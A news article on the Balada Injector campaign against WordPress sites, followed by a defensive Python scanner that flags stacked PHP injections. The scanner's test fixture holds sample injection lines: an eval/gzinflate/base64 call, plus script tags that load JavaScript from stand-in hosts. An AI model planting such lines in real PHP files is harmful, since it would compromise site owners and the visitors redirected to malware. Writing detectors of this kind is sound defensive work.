The Balada Injector malware is alive and well, compromising poorly secured WordPress websites across the internet, as well as using them to target visitors, new research has found.
In a report, Cybernews researchers claim to have found a compromised WordPress website during a “routine web monitoring operation”.
The compromised website was apparently targeted by the Balada Injector malware, a Linux-based backdoor used to infiltrate websites through known vulnerabilities in WordPress plugins, themes, and similar components. The Balada Injector is known for attacking in “waves”: every month or so the injector uses a new domain name and a new piece of code, which it attempts to add to the WordPress site’s code.
Waves of attacks
Seven different instances of malicious code had been added to this particular site, stacked on top of each other, meaning the website had endured seven “waves” of hacking attacks. This code, added at the very top of the page so that it ran before the website loaded, was intended to give the attackers remote access to infected machines and to redirect visitors to various websites where malvertising campaigns were running.
When the researchers dissected and examined some of the PHP payloads found on the compromised website, they discovered URLs of newly spawned Command & Control (C2) endpoints and the obfuscated JavaScript files subsequently used in the operation. According to the researchers, a total of five URLs were used to load malicious JavaScript on exploited websites.
The good news for potential victims is that the Balada Injector is still not as advanced as it could be. It does not check whether a compromised website already carries malicious code, which is why this website forced the download of a PHP file instead of displaying its landing page. That raised red flags among the researchers and, at the end of the day, helped uncover the hacking campaign.
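The stacking behaviour described above, where each wave prepends its own self-contained PHP block to the top of a file without checking for earlier ones, is something a site owner can look for directly. The scanner below is an added example written for this article; it is not code from Cybernews or from any Balada analysis. It assumes that a clean WordPress PHP file opens with a single `<?php` block and that injected payloads arrive as closed `<?php ... ?>` blocks stacked ahead of it, typically using `eval()`, `base64_decode()` or an external `<script src>` tag. The sample files, the hostnames (on the reserved `.invalid` TLD) and the base64 string are all constructed for the demonstration.

```python
"""Detect stacked, prepended PHP injections at the top of WordPress files.

Added example (not from Cybernews or the article). The heuristics and the
sample files below are assumptions/constructed: a clean WordPress PHP file
starts with one `<?php` block; injected payloads are prepended as closed
`<?php ... ?>` blocks (one per wave) that lean on eval()/base64_decode()
or emit a <script src="https://..."> tag pointing at an external host.
"""
import base64
import re
from dataclasses import dataclass, field

# A closed PHP block; re.S lets the body span several lines.
BLOCK_RE = re.compile(r"<\?php\b(.*?)\?>", re.S)
URL_RE = re.compile(r"https?://[^\s'\"<>()]+")
B64_LITERAL = re.compile(r"'([A-Za-z0-9+/]{16,}={0,2})'")
INJECTION_MARKERS = (
    re.compile(r"\beval\s*\("),
    re.compile(r"\bbase64_decode\s*\("),
    re.compile(r"\bgzinflate\s*\("),
    re.compile(r"<script[^>]+src=[\"']https?://", re.I),
)


@dataclass
class ScanResult:
    path: str
    prepended_blocks: int                                 # closed blocks before the real file starts
    suspicious: list[int] = field(default_factory=list)   # indexes of flagged blocks (one per "wave")
    urls: list[str] = field(default_factory=list)         # remote URLs the flagged blocks reference

    @property
    def infected(self) -> bool:
        return bool(self.suspicious)


def leading_php_blocks(source: str) -> list[str]:
    """Bodies of the closed <?php ... ?> blocks stacked at the very top of the file."""
    blocks = []
    pos = len(source) - len(source.lstrip())   # skip leading whitespace
    while True:
        m = BLOCK_RE.match(source, pos)        # anchored at pos: only contiguous blocks count
        if not m:
            break
        blocks.append(m.group(1))
        pos = m.end()
        while pos < len(source) and source[pos].isspace():
            pos += 1
    return blocks


def extract_urls(body: str) -> list[str]:
    """Remote URLs in a block, including ones hidden inside base64 literals."""
    found = set(URL_RE.findall(body))
    for literal in B64_LITERAL.findall(body):
        try:
            decoded = base64.b64decode(literal, validate=True).decode("utf-8", "ignore")
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        found.update(URL_RE.findall(decoded))
    return sorted(found)


def scan_source(path: str, source: str) -> ScanResult:
    """Flag each leading block that matches an injection marker; collect its URLs as indicators."""
    blocks = leading_php_blocks(source)
    suspicious = [i for i, body in enumerate(blocks)
                  if any(p.search(body) for p in INJECTION_MARKERS)]
    urls = sorted({u for i in suspicious for u in extract_urls(blocks[i])})
    return ScanResult(path, len(blocks), suspicious, urls)


def scan_file(path: str) -> ScanResult:
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_source(path, fh.read())


# --- constructed samples (not real payloads; hosts use the reserved .invalid TLD) ---
CLEAN_INDEX = (
    "<?php\n/** Front to the WordPress application. */\n"
    "define('WP_USE_THEMES', true);\nrequire __DIR__ . '/wp-blog-header.php';\n"
)
# A theme template legitimately opens with a closed block; it must not be flagged.
CLEAN_HEADER = "<?php /** Theme header template. */ ?>\n<!DOCTYPE html>\n<html>\n"
_WAVE1_TAG = base64.b64encode(
    b'<script src="https://wave1.example.invalid/a.js"></script>').decode()
INFECTED_INDEX = (
    f"<?php if(!isset($_COOKIE['w1'])){{echo base64_decode('{_WAVE1_TAG}');}} ?>\n"
    "<?php eval(gzinflate(base64_decode('...'))); ?>\n"   # wave 2, payload body elided
    "<?php echo '<script src=\"https://wave3.example.invalid/s.js\"></script>'; ?>\n"
    + CLEAN_INDEX
)

if __name__ == "__main__":
    for name, src in (("index.php", CLEAN_INDEX), ("header.php", CLEAN_HEADER),
                      ("index.php (infected)", INFECTED_INDEX)):
        r = scan_source(name, src)
        print(f"{r.path}: {r.prepended_blocks} leading block(s), "
              f"{len(r.suspicious)} flagged, infected={r.infected}, urls={r.urls}")
```

Run against a WordPress tree with `scan_file()` on each `.php` file; the count of flagged leading blocks approximates how many waves hit a file, and the collected URLs are the hosts to block and to search for across the rest of the site. The `header.php` sample shows why the scanner keys on the markers rather than on the mere presence of a closed block: theme templates legitimately start that way.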